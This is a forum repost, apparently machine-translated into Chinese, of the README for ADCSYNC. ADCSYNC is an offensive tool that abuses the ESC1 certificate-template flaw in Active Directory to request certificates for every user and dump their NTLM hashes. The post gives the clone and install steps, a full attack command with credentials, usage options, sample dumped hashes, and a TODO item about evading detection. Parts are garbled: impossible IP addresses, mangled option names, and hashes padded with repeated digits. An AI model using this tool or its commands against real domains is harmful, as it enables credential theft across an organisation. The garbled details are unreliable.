ADCSYNC-使用ESC1执行临时DCSYNC和DUMP HASHES

taibeihacker

Moderator
这是我快速搅动使用ESC1的DCSYNC的工具。它非常慢,但是否则是执行临时DCSYNC攻击的有效方法,而无需使用Drsuapi或音量阴影副本。
这是该工具的第一个版本,基本上只是自动化对域中每个用户运行证书的过程。它仍然需要大量工作,我计划将来添加更多功能,以进行身份验证方法并自动化查找脆弱模板的过程。
python3 adcsync.py -u clu -p Perfectsystem -ca theGrid -kflynn -dc -ca -template smartCard -target -ip 192.168.0.0.0.0.0.98 -dc -ip 192.168.0.0.0.0.98 -f user
______ ______________
/|/__ \/____/____/______ _______________
//| |///////\ __ \////////__ \/___//___ /
/___ |//_//////_____////////////点//////////////////////////////////////////////__
/_/| _/_____/\ ____ //___/\ _____,/_//_/_/\ ___//\ ___//
/____/
获取用户证书:
100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 105/105 [02:1800:00,1.32S/it]
THEGRID.LOCAL/shirlee.saraann:aad3b435b51404eeaad3b435b51404ee:68832255545152d843216ed7bbb2d09e:
THEGRID.LOCAL/rosanne.nert:aad3b435b51404eeaad3b435b51404ee:a20821df366981f7110c07c7708f7ed2:
thegrid.local/edita.lauree3:AAD3B435B51404EEAAD3B435B51404E E:B212294E06A0757547D66B78BB632D693333333333333333333333333333333333:
THEGRID.LOCAL/carol.elianore:aad3b435b51404eeaad3b435b51404ee:ed4603ce5a1c86b977dc049a77d2cc6f:
THEGRID.LOCAL/astrid.lotte:aad3b435b51404eeaad3b435b51404ee:201789a1986f2a2894f7ac726ea12a0b:
THEGRID.LOCAL/louise.hedvig:aad3b435b51404eeaad3b435b51404ee:edc599314b95cf5635eb132a1cb5f04d:
THEGRID.LO CAL/janelle.jess:aad3b435b51404eeaad3b435b51404ee:a7a1d8ae1867bb60d23e0b88342a6fab:
THEGRID.LOCAL/marie-ann.kayle:aad3b435b51404eeaad3b435b51404ee:a55d86c4b2c2b2ae526a14e7e2cd259f:
thegrid.local/jeanie.isa:aad3b435b51404eeaaad3b435b51404ee :61F8C2BF0DC5793A578AA2BC835F2E5333333333333333333333333333333:10-1010 ADCSYNC使用ESC1漏洞利用在Active Directory环境中从用户帐户中转换NTLM哈希。该工具将首先在传递的“血腥猎犬”文件中获取每个用户和域。然后,它将使用certipy向每个用户提出请求,并将其PFX文件存储在证书目录中。最后,它将使用证书对证书进行身份验证,并为每个用户检索NT哈希。这个过程非常慢,可能需要一段时间才能完成,但提供了一种倾倒NTLM哈希的替代方法。

Introduction​

GIT克隆https://github.com/jpg0mez/adcsync.git
CD ADCSYNC
pip3 install -r unigess.txt

Installation​

要使用此工具,我们需要以下内容:
有效的域凭证从将通过的血犬转储中的用户列表。
______ ______________
/|/__ \/____/____/______ _______________
//| |///////\ __ \////////__ \/___//___ /
/___ |//_//////_____////////////点//////////////////////////////////////////////__
/_/| _/_____/\ ____ //___/\ _____,/_//_/_/\ ___//\ ___//
/____/
USAGE: ADCSYNC.PY [选项]
Options:
-f, - 文件文本输入用户列表JSON文件[必需]
-o, - 输出文本NTLM哈希输出文件[必需]
-CA文本证书授权[必需]
-DC-IP域控制器的文本IP地址[必需]
-U, - 用户文本用户名[必需]
-p, - password文本密码[必需]
- 模板文本模板名称容易受到ESC1的影响[必需]
-target-IP文本IP地址[必需]
- 主持人显示此消息和退出。

Usage​

Support alternative authentication methods such as NTLM hashes and ccache files Automatically run 'certipy find' to find and grab templates vulnerable to ESC1 Add jitter and sleep options to avoid detection Add type validation for all variables

TODO​

puzzlepeaches: Telling me to anxious up and write this ly4k: For Certipy Wazehell:用于脚本以设置用于测试的脆弱广告环境
 
返回
上方